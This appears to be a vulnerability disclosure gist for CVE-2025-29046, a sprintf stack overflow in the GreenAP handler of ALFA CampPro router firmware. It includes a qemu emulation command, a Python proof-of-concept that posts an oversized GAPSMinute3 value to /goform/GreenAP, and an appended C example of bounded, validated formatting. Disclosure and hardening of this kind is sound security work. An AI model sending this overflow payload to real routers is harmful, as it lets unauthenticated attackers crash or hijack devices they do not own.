
@xyqer1
Last active April 17, 2025 09:06

ALFA WiFi CampPro-GreenAP-GAPSMinute3

Vulnerability Details

  • Affected Firmware: ALFA_CAMPRO-co-2.29
  • CVE-ID: CVE-2025-29046
  • Root Cause: By analyzing the goahead file in the bin directory, I found that the function GreenAP contains a stack overflow vulnerability.
  • Impact: Remote unauthenticated attackers can hijack the program's control flow.

Vendor Information

During my internship at Qi An Xin Tiangong Lab, I discovered a stack overflow vulnerability in the ALFA WiFi CampPro router.

By analyzing the goahead file in the bin directory, I found that the function GreenAP contains a stack overflow vulnerability.

The stack overflow can be triggered by the GAPSMinute3 key value, which leads to a sprintf stack overflow.


How to emulate the router

Use the following command to emulate the goahead binary with qemu-mipsel-static.

sudo qemu-mipsel-static -L ./ ./bin/goahead

The content of the poc.py file is as follows:

import requests

url = "http://127.0.0.1/goform/GreenAP"
# Constructed oversized value for the GAPSMinute3 parameter (0x100 bytes)
data = {
    "GAPSMinute3": "a" * 0x100
}

res = requests.post(url, data=data)
print(res.text)

Attack result


One can see that its stack frame is 0x100 bytes.


After execution, it overflows to 0x14c. If you want to overflow more, you can modify the GAPSMinute3 key value in the code.
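As an added defensive illustration (not code from this gist or from the ALFA firmware): a bounded replacement for the sprintf pattern described above, assuming the 0x100-byte stack buffer measured above, a hypothetical format string, and that GAPSMinute3 is a 0..59 minute value; the real handler's format string and field semantics are not on this page.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Stack buffer size taken from the writeup (0x100 bytes). */
#define GREENAP_BUF_LEN 0x100

/* Hypothetical hardened replacement for the unbounded sprintf in GreenAP.
 * Assumption: GAPSMinute3 is a minute-of-hour value (0..59); the real
 * format string and field semantics are not known from the writeup.
 * Returns 0 on success, -1 when the input is rejected or would not fit. */
int greenap_format_minute(const char *gaps_minute3, char *out, size_t out_len)
{
    if (gaps_minute3 == NULL || out == NULL || out_len == 0)
        return -1;
    /* Gate 1: cap the length before the value touches any fixed buffer. */
    size_t len = strlen(gaps_minute3);
    if (len == 0 || len > 2)
        return -1;
    /* Gate 2: digits only, then range-check the parsed value. */
    for (size_t i = 0; i < len; i++)
        if (!isdigit((unsigned char)gaps_minute3[i]))
            return -1;
    long minute = strtol(gaps_minute3, NULL, 10);
    if (minute > 59)
        return -1;
    /* Gate 3: bounded formatting. snprintf never writes past out_len, and a
     * return value >= out_len means truncation, which is treated as an error. */
    int n = snprintf(out, out_len, "GAPSMinute3=%ld", minute);
    if (n < 0 || (size_t)n >= out_len)
        return -1;
    return 0;
}

/* Stand-in for the handler: the same 0x100-byte stack frame, now guarded. */
int greenap_handle(const char *gaps_minute3)
{
    char buf[GREENAP_BUF_LEN];
    return greenap_format_minute(gaps_minute3, buf, sizeof buf);
}

/* Rebuilds the PoC input ("a" * 0x100) and returns 1 if the guard rejects it. */
int greenap_rejects_poc_input(void)
{
    char poc[GREENAP_BUF_LEN + 1];
    memset(poc, 'a', GREENAP_BUF_LEN);
    poc[GREENAP_BUF_LEN] = '\0';
    return greenap_handle(poc) == -1;
}
```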
